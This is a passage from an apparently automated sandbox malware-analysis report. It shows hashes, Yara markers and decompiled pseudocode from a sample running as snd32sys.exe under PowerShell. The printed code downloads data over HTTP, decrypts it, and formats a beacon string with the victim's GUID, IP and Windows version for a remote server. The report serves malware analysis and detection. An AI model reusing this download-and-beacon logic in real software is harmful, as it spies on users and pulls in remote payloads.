                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 06430F9F, Relevance: .0, Instructions: 4COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 06430FA7, Relevance: .0, Instructions: 4COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 06430FAF, Relevance: .0, Instructions: 4COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 06430FB7, Relevance: .0, Instructions: 4COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 06430FBF, Relevance: .0, Instructions: 4COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000003.224137545.0000000006430000.00000010.00000001.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                    • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Analysis Process: powershell.exe PID: 5944 Parent PID: 5756 powershell.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 04B24DE8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 04B24E60
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348430959.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 9abbf707d3327432093c4bb3e209e7c2420ee48d8d943b02a870ffef07a412f1
                                                                                                                                                    • Instruction ID: 564b2ba3bf63bdc3b69aa551833bb6812cbbc10939d7575e8c3c36f2d700106e
                                                                                                                                                    • Opcode Fuzzy Hash: 9abbf707d3327432093c4bb3e209e7c2420ee48d8d943b02a870ffef07a412f1
                                                                                                                                                    • Instruction Fuzzy Hash: 5B1156B1D0061A9BCB14CFA9D944BDEFBF4FB48324F10821AE818B3640C738A900CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 04B23F9C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 04B24E60
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348430959.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 47dcfaa247d8baec4c012d245cfd1c6a90337832920eee3f428fc18f5d00a5e6
                                                                                                                                                    • Instruction ID: 66be5cb36666c332e92d05d0aac8d9c2e70ff2c490bae00d586505d2c3a5186c
                                                                                                                                                    • Opcode Fuzzy Hash: 47dcfaa247d8baec4c012d245cfd1c6a90337832920eee3f428fc18f5d00a5e6
                                                                                                                                                    • Instruction Fuzzy Hash: D62156B1D0061A9BCB14DFA9D94479EFBF4FB48324F00815AD819B7600D778A900CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 049DD01D, Relevance: .0, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348057063.00000000049DD000.00000040.00000001.sdmp, Offset: 049DD000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8c25da433ed6b1692dbf309506b6fcc349ce0aeb91a741cde32a504a60a37dcd
                                                                                                                                                    • Instruction ID: 22b6718ed35a353b2a5018548aeff008c4c8135688c78a9b0de25c467b44ab9d
                                                                                                                                                    • Opcode Fuzzy Hash: 8c25da433ed6b1692dbf309506b6fcc349ce0aeb91a741cde32a504a60a37dcd
                                                                                                                                                    • Instruction Fuzzy Hash: D001A771505344ABEB104E25EC84BA7FF9CEF81668F08C669ED051B242D379B945C6F1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 049DD005, Relevance: .0, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348057063.00000000049DD000.00000040.00000001.sdmp, Offset: 049DD000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e63fb8acca4e3cf187229aa7b069f429417ec67a292af6eb48e9e8f64f411b0b
                                                                                                                                                    • Instruction ID: e38e74691dcd93b87d668a05065e691c0ea53ce091bf966e554d12f636118160
                                                                                                                                                    • Opcode Fuzzy Hash: e63fb8acca4e3cf187229aa7b069f429417ec67a292af6eb48e9e8f64f411b0b
                                                                                                                                                    • Instruction Fuzzy Hash: 8601406140E3C45FD7128B219C94B52BFB4EF43624F09C1DBD9858F293C2695849C772
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Analysis Process: snd32sys.exe PID: 2160 Parent PID: 5944 snd32sys.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00611FC0, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 183networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E00611FC0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
				void* _v8;
				long _v12;
				void* _v16;
				signed short _v20;
				signed int _v24;
				void _v28;
				void _v32;
				void* _v36;
				long _v40;
				long _v44;
				int _v48;
				intOrPtr _v60;
				char* _v64;
				signed short _v84;
				intOrPtr _v88;
				char* _v92;
				long _v96;
				void* _v108;
				char _v368;
				char _v628;
				int _t79;
				void* _t80;
				void* _t83;
				void* _t141;

				E006114A0( &_v108, 0, 0x3c);
				_v108 = 0x3c;
				_v92 =  &_v368;
				_v88 = 0x104;
				_v64 =  &_v628;
				_v60 = 0x104;
				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
				if(_t79 != 0) {
					if(_v96 == 0) {
						_v96 = 3;
					}
					if(_v96 == 3 || _v96 == 4) {
						_t80 = E006124D0(); // executed
						_v36 = _t80;
						if(_v36 != 0) {
							_v20 = _v84;
							_v24 = 0x84080100;
							if(_v96 == 4) {
								_v24 = _v24 | 0x00803000;
							}
							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
							_v16 = _t83;
							if(_v16 != 0) {
								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x617050, _v24, 1);
								if(_v8 != 0) {
									if(_v96 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
										_v28 = _v28 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
									}
									HttpSendRequestA(_v8, 0, 0, 0, 0);
									_v32 = 0;
									_v44 = 4;
									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
									if(_v32 != 0xc8 || _a8 == 0) {
										L26:
										InternetCloseHandle(_v8); // executed
										InternetCloseHandle(_v16);
										if(_v32 != 0xc8) {
											return 0;
										}
										return 1;
									} else {
										 *_a16 = 0;
										while(1 != 0) {
											_v48 = InternetReadFile(_v8, _a8, _a12,  &_v12);
											if(_v48 != 1 || _v12 <= 0) {
												goto L26;
											} else {
												_a8 = _a8 + _v12;
												_a12 = _a12 - _v12;
												 *_a16 =  *_a16 + _v12;
												continue;
											}
										}
										goto L26;
									}
								}
								InternetCloseHandle(_v16);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}



























                                                                                                                                                    0x00611fd1
                                                                                                                                                    0x00611fd9
                                                                                                                                                    0x00611fe6
                                                                                                                                                    0x00611fe9
                                                                                                                                                    0x00611ff6
                                                                                                                                                    0x00611ff9
                                                                                                                                                    0x00612008
                                                                                                                                                    0x00612018
                                                                                                                                                    0x0061202c
                                                                                                                                                    0x00612034
                                                                                                                                                    0x00612041
                                                                                                                                                    0x00612043
                                                                                                                                                    0x00612043
                                                                                                                                                    0x0061204e
                                                                                                                                                    0x0061205d
                                                                                                                                                    0x00612062
                                                                                                                                                    0x00612069
                                                                                                                                                    0x00612076
                                                                                                                                                    0x0061207a
                                                                                                                                                    0x00612085
                                                                                                                                                    0x00612090
                                                                                                                                                    0x00612090
                                                                                                                                                    0x006120ad
                                                                                                                                                    0x006120b3
                                                                                                                                                    0x006120ba
                                                                                                                                                    0x006120e8
                                                                                                                                                    0x006120ef
                                                                                                                                                    0x00612106
                                                                                                                                                    0x00612108
                                                                                                                                                    0x0061211d
                                                                                                                                                    0x0061212b
                                                                                                                                                    0x0061213a
                                                                                                                                                    0x0061213a
                                                                                                                                                    0x0061214c
                                                                                                                                                    0x00612152
                                                                                                                                                    0x00612159
                                                                                                                                                    0x00612173
                                                                                                                                                    0x00612180
                                                                                                                                                    0x006121e4
                                                                                                                                                    0x006121e8
                                                                                                                                                    0x006121f2
                                                                                                                                                    0x006121ff
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612208
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612188
                                                                                                                                                    0x0061218b
                                                                                                                                                    0x00612191
                                                                                                                                                    0x006121b0
                                                                                                                                                    0x006121b7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006121bf
                                                                                                                                                    0x006121c5
                                                                                                                                                    0x006121ce
                                                                                                                                                    0x006121dc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006121e2
                                                                                                                                                    0x006121b7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612191
                                                                                                                                                    0x00612180
                                                                                                                                                    0x006120f5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006120bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006120bc
                                                                                                                                                    0x006120ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612056
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612056
                                                                                                                                                    0x0061204e
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • InternetCrackUrlA.WININET(00611AB9,00000000,00000000,0000003C), ref: 0061202C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CrackInternet
                                                                                                                                                    • String ID: <$B%a$GET
                                                                                                                                                    • API String ID: 1381609488-3357173869
                                                                                                                                                    • Opcode ID: f5acebf211a56d0586872e3b5f15cada2fb4ac8aa6e76b78391c87dfd7b389e3
                                                                                                                                                    • Instruction ID: 8608a015060b1a11a3ed4062ddd993fb279471ee5d7f18d67297e92430b70ccb
                                                                                                                                                    • Opcode Fuzzy Hash: f5acebf211a56d0586872e3b5f15cada2fb4ac8aa6e76b78391c87dfd7b389e3
                                                                                                                                                    • Instruction Fuzzy Hash: 3D714A70D0020AEFEB14CFA0CC59BEEB7B6FB48301F148129E611AB280D7749A95CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006B17C3, Relevance: 13.8, APIs: 9, Instructions: 333memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0000099E,00003000,00000040,0000099E,006B12C6), ref: 006B1897
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,006B12FF), ref: 006B18CE
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,0000759C,00003000,00000040), ref: 006B192E
                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006B1964
                                                                                                                                                    • VirtualProtect.KERNEL32(00610000,00000000,00000004,006B179A), ref: 006B1A78
                                                                                                                                                    • VirtualProtect.KERNEL32(00610000,00001000,00000004,006B179A), ref: 006B1A9F
                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,006B179A), ref: 006B1B73
                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,006B179A,?), ref: 006B1BC9
                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006B1BED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.487458396.00000000006B1000.00000040.00020000.sdmp, Offset: 006B1000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                    • Opcode ID: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
                                                                                                                                                    • Instruction ID: 7061b6e3f8d6015b6e4087619e5eaee3070ea449921b068994a5cd1b3eee6d5b
                                                                                                                                                    • Opcode Fuzzy Hash: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
                                                                                                                                                    • Instruction Fuzzy Hash: 05D160B2700B01AFDF908F14C9D8B9177ABFF85320B594198ED099F76AD770A840CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612CB0, Relevance: 12.1, APIs: 8, Instructions: 91encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00612CB0(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
				int _v8;
				long* _v12;
				long* _v16;
				int _v20;
				intOrPtr _v24;
				int _t32;
				intOrPtr _t33;
				long* _t35;

				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0x280011;
				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t32 != 0) {
					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8); // executed
					if(_t32 != 0) {
						_t33 = _a16;
						__imp__CryptHashData(_v8, _a12, _t33, 0);
						if(_t33 != 0) {
							_t35 = _v12;
							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16); // executed
							if(_t35 != 0) {
								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
									_v20 = _a8;
								}
							}
						}
					}
				}
				if(_v8 != 0) {
					__imp__CryptDestroyHash(_v8);
					_v8 = 0;
				}
				if(_v16 != 0) {
					CryptDestroyKey(_v16);
					_v16 = 0;
				}
				if(_v12 != 0) {
					CryptReleaseContext(_v12, 0);
					_v12 = 0;
				}
				return _v20;
			}











                                                                                                                                                    0x00612cb6
                                                                                                                                                    0x00612cbd
                                                                                                                                                    0x00612cc4
                                                                                                                                                    0x00612ccb
                                                                                                                                                    0x00612cd2
                                                                                                                                                    0x00612ce8
                                                                                                                                                    0x00612cf0
                                                                                                                                                    0x00612d0d
                                                                                                                                                    0x00612d15
                                                                                                                                                    0x00612d1d
                                                                                                                                                    0x00612d29
                                                                                                                                                    0x00612d31
                                                                                                                                                    0x00612d48
                                                                                                                                                    0x00612d4c
                                                                                                                                                    0x00612d54
                                                                                                                                                    0x00612d74
                                                                                                                                                    0x00612d7d
                                                                                                                                                    0x00612d7d
                                                                                                                                                    0x00612d74
                                                                                                                                                    0x00612d54
                                                                                                                                                    0x00612d31
                                                                                                                                                    0x00612d15
                                                                                                                                                    0x00612d84
                                                                                                                                                    0x00612d8a
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d90
                                                                                                                                                    0x00612d9b
                                                                                                                                                    0x00612da1
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612da7
                                                                                                                                                    0x00612db2
                                                                                                                                                    0x00612dba
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dc0
                                                                                                                                                    0x00612dcd

                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00612CE8
                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00612D0D
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1222261195-0
                                                                                                                                                    • Opcode ID: fb95e833f5d99fde2cca6303f21b4c61c98bce1a9742dcd129006842046f6dae
                                                                                                                                                    • Instruction ID: d5565fa87042775128166fc50eac0159afbdcedc86893f2a08eec3b1c53fdbce
                                                                                                                                                    • Opcode Fuzzy Hash: fb95e833f5d99fde2cca6303f21b4c61c98bce1a9742dcd129006842046f6dae
                                                                                                                                                    • Instruction Fuzzy Hash: 3F311AB5E00209FBEB14CF91DC98FEE77BAAF48705F148549F601A7280D7B49A94DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006133E0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E006133E0() {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				struct _SYSTEM_INFO _v48;

				E006114A0( &_v48, 0, 0x24);
				_v8 = GetModuleHandleA("kernel32.dll");
				if(_v8 != 0) {
					_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
					if(_v12 == 0) {
						GetSystemInfo( &_v48);
					} else {
						_v12( &_v48);
					}
					if((_v48.dwOemId & 0x0000ffff) != 9) {
						return 0;
					} else {
						return 1;
					}
				}
				return 0;
			}






                                                                                                                                                    0x006133ee
                                                                                                                                                    0x00613401
                                                                                                                                                    0x00613408
                                                                                                                                                    0x0061341d
                                                                                                                                                    0x00613424
                                                                                                                                                    0x00613433
                                                                                                                                                    0x00613426
                                                                                                                                                    0x0061342a
                                                                                                                                                    0x0061342a
                                                                                                                                                    0x00613440
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613442
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613442
                                                                                                                                                    0x00613440
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00611B01), ref: 006133FB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00613417
                                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0061342A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                    • API String ID: 3469989633-192647395
                                                                                                                                                    • Opcode ID: 756ae912b47a5e60a0005117ca118972c465a56fcdef022e2d18eb4fdd9a0d63
                                                                                                                                                    • Instruction ID: 4624b33e4be5cd6507fe1f3879bd02fe01205f3f3902884e5689e0581d7ced49
                                                                                                                                                    • Opcode Fuzzy Hash: 756ae912b47a5e60a0005117ca118972c465a56fcdef022e2d18eb4fdd9a0d63
                                                                                                                                                    • Instruction Fuzzy Hash: 76013135D00218EBCB14DFF59849BED7BBAAB08711F598565E602A3280EB7487C49761
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00611A80, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E00611A80(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v68;
				char _v324;
				char _v2372;
				char _v6468;
				intOrPtr _t47;
				intOrPtr _t56;
				char* _t63;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				char* _t72;
				void* _t75;
				char* _t89;
				intOrPtr _t95;
				char* _t104;
				intOrPtr _t106;
				void* _t110;
				void* _t113;
				void* _t114;

				_t95 = __edx;
				E00611420(0x1940);
				_v12 = GetVersion();
				_t47 = E00612610(_t95); // executed
				_v32 = _t47;
				_v28 = _t95;
				E006130D0( &_v324); // executed
				E00612500( &_v68,  &_v68); // executed
				E006123A0( &_v2372); // executed
				_t113 = _t110 + 0xc;
				_v20 = _v12 & 0xff;
				_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
				_t56 = E006133E0(); // executed
				_v36 = _t56;
				if(_v36 != 1) {
					_push(_v16);
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E00612590( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				} else {
					_push(_v16);
					_t75 = E00612590( &_v324); // executed
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				}
				if( *0x617298 == 0) {
					_t71 = E00611390(0x400);
					_t114 = _t114 + 4;
					 *0x617298 = _t71;
					_t72 =  *0x617298; // 0x13dbeb8
					 *_t72 = 0;
				}
				_v24 = 1;
				while(_v24 == 1) {
					_t63 =  *0x617298; // 0x13dbeb8
					_t87 =  *_t63;
					if( *_t63 == 0) {
						_t106 =  *0x617298; // 0x13dbeb8
						_t70 = E00612640(_t87, _t106);
						_t114 = _t114 + 4;
						_v24 = _t70;
					}
					_t89 =  *0x617298; // 0x13dbeb8
					_t66 = E006128B0(_t89,  &_v6468, _a4, _a8, _a12); // executed
					_t114 = _t114 + 0x14;
					_v8 = _t66;
					if(_v8 == 1) {
						_t69 = E006119E0(_t89, _a4);
						_t114 = _t114 + 4;
						_v8 = _t69;
					}
					if(_v8 != 1) {
						_t104 =  *0x617298; // 0x13dbeb8
						 *_t104 = 0;
						continue;
					} else {
						return 1;
					}
				}
				return 0;
			}































                                                                                                                                                    0x00611a80
                                                                                                                                                    0x00611a88
                                                                                                                                                    0x00611a93
                                                                                                                                                    0x00611a96
                                                                                                                                                    0x00611a9b
                                                                                                                                                    0x00611a9e
                                                                                                                                                    0x00611aa8
                                                                                                                                                    0x00611ab4
                                                                                                                                                    0x00611ac3
                                                                                                                                                    0x00611ac8
                                                                                                                                                    0x00611adf
                                                                                                                                                    0x00611af9
                                                                                                                                                    0x00611afc
                                                                                                                                                    0x00611b01
                                                                                                                                                    0x00611b08
                                                                                                                                                    0x00611b4c
                                                                                                                                                    0x00611b7d
                                                                                                                                                    0x00611b83
                                                                                                                                                    0x00611b0a
                                                                                                                                                    0x00611b0d
                                                                                                                                                    0x00611b24
                                                                                                                                                    0x00611b3e
